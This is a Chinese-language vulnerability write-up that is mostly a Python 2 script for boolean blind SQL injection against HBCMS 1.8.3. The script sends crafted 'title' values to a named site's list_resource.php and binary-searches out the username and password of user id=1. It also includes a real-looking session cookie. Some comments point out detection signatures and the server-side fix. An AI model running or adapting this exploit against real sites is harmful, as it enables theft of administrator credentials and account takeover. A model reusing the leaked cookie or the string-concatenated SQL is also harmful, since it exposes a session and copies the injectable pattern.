漏洞分析

python 盲注 HBCMS 1.8.3 漏洞

根据某篇文章的描述(原文已 404),利用时应该需要携带登录 cookie。准备工作:先上传一张图片。

代码采用二分法,类似于sqlmap的算法

#-*- coding: UTF-8 -*-
__author__ = 'Administrator'

import requests

def post_data(step,p,min,max):
    """Return the SQL condition fragment that the probe loop below splices into the ``title`` field.

    step 1 / 2: ``(select length(login_name|login_pass) ...) > p`` for the row ``id=1``.
    step 3 / 4: ``(select mid(column, p, 1) ...) between char(min) and char(max)``.
    ``min`` and ``max`` are only used by steps 3 and 4 (the step 1/2 callers pass
    ``0,0``); they also shadow the builtins of the same name. A ``step`` outside
    1..4 leaves ``sql_code`` unassigned and the ``return`` raises UnboundLocalError.

    The fragment is concatenated into the request without any escaping, which is
    exactly the string-built SQL that a parameterized query on the server side
    would neutralize.
    """
    if step == 1:
        sql_code = "(select length(login_name) from hbcms_users where id=1)>"+str(p)
    if step == 2:
        sql_code = "(select length(login_pass) from hbcms_users where id=1)>"+str(p)
    if step == 3:
        sql_code = "(select mid(login_name,"+str(p)+",1) from hbcms_users where id=1) between char("+str(min)+") and char("+str(max)+")"
    if step == 4:
        sql_code = "(select mid(login_pass,"+str(p)+",1) from hbcms_users where id=1) between char("+str(min)+") and char("+str(max)+")"
    return sql_code

# Boolean-based blind probe loop (Python 2 syntax: print statements, str r.content).
# Every request is a POST to /user/list_resource.php whose ``title`` field closes
# the quoted value, appends the condition from post_data(), and re-opens it with
# ``"%a%"="%a``; whether the uploaded image name appears in the response body is
# the true/false oracle (see the ``if ... in r.content`` checks below).
# For defenders: that ``title`` shape — a quote followed by `` and (select `` and
# repeated requests from one session — is a ready-made WAF / access-log
# detection signature, and a parameterized query (or rejecting quotes in the
# filter) on the server side removes the injection entirely.
# The literal Cookie below is a session credential copied from the page; treat
# any such value as a secret and never commit one.
# ``min`` / ``max`` are used as plain variables below and shadow the builtins.
header = {  # Cookie has to be replaced with your own session cookie
            "Cookie":"visited_page=5629-; bdshare_firstime=1422370057395; PHPSESSION=ep7nhkn8poei9jbckd68j2arr1; HBcmsLogin=19d2c1427b496606c40cdfa0f7139327dca4962953fb8ea0fda93c3b87635c12lbc555; HBcmsLoginName=lbc555; HBcmsLoginID=1122; Hm_lvt_f9fcde02679434efdea208afff286914=1422370057,1422410160; Hm_lpvt_f9fcde02679434efdea208afff286914=1422410945; AJSTAT_ok_pages=28; AJSTAT_ok_times=1; Hm_lvt_a3afd03fd164ca89566a02f9c9db5dad=1422370057,1422410160; Hm_lpvt_a3afd03fd164ca89566a02f9c9db5dad=1422410945"
}
# Results of steps 1/2 (lengths) feed the per-character loops of steps 3/4.
name_len = 1
pass_len = 32
name_con = ""
pass_con = ""
for step in range(1,5):
    if step == 1 or step == 2:
        # Binary search on the length in the window (min, max); p is the midpoint.
        p = 20
        min = 0
        max = 40
        while(1):
            #print str(max)+":"+str(min)
            # Hard cap: a length that reaches the upper bound is treated as an error.
            if p == 40:
                print "Too long! Fuck you!"
                break
            payload = {
                "show_top_part=":"yes",
                "pageID":"1",
                "category_id":"all",
                "file_type":"0",
                "title":"q%\" and "+ post_data(step,p,0,0) +" and \"%a%\"=\"%a",
                "btnSubmit":"提交"
            }
            r = requests.post('http://www.hackblog.cn/user/list_resource.php',data=payload,headers=header) # change the target url
            # Oracle: the condition was true when the uploaded image name is in the response.
            if "1309_1122_150128100612.gif" in r.content: # change to the name of the image you uploaded
                min = p
                p = int(round((float(max) - float(min))/2)) + min
                # Window has collapsed to one value; p is the answer.
                if max - min == 1:
                    if step == 1:
                        name_len = p
                        print "username length is "+str(name_len)
                        break
                    if step == 2:
                        pass_len = p
                        print "password length is "+str(pass_len)
                        break
            else:
                max = p
                p = int(round((float(max) - float(min))/2)) + min
                if max - min == 1:
                    if step == 1:
                        name_len = p
                        print "username length is "+str(name_len)
                        break
                    if step == 2:
                        pass_len = p
                        print "password length is "+str(pass_len)
                        break

    if step == 3 or step == 4:
        if step == 3:
            end = name_len
        else:
            end = pass_len
        # One binary search per character position k, over printable ASCII 32..126.
        for k in range(1,end+1):
            p = 47
            min = 32
            max = 126
            while(1):
                #print str(max)+":"+str(min)+":"+str(p)
                payload = {
                    "show_top_part=":"yes",
                    "pageID":"1",
                    "category_id":"all",
                    "file_type":"0",
                    "title":"q%\" and "+ post_data(step,k,p,max) +" and \"%a%\"=\"%a",
                    "btnSubmit":"提交"
                }
                r = requests.post('http://www.hackblog.cn/user/list_resource.php',data=payload,headers=header) # change the target url
                if "1309_1122_150128100612.gif" in r.content: # change to the name of the image you uploaded
                    # Exit condition for this search is a window of width 2, not 1.
                    if max - min == 2:
                        if step == 3:
                            name_con = name_con + chr(p)
                            print "username is "+name_con
                        else:
                            pass_con = pass_con + chr(p)
                            print "password is "+pass_con
                        break
                    # NOTE(review): the +1 / -1 nudges below presumably keep the window
                    # from shrinking past the ==2 exit above — not verified here.
                    if max - min == 1:
                        max = max + 1
                    min = p
                    p = int(round((float(max) - float(min))/2)) + min

                else:
                    if max - min == 1:
                        min = min - 1
                    max = p
                    p = int(round((float(max) - float(min))/2)) + min

 
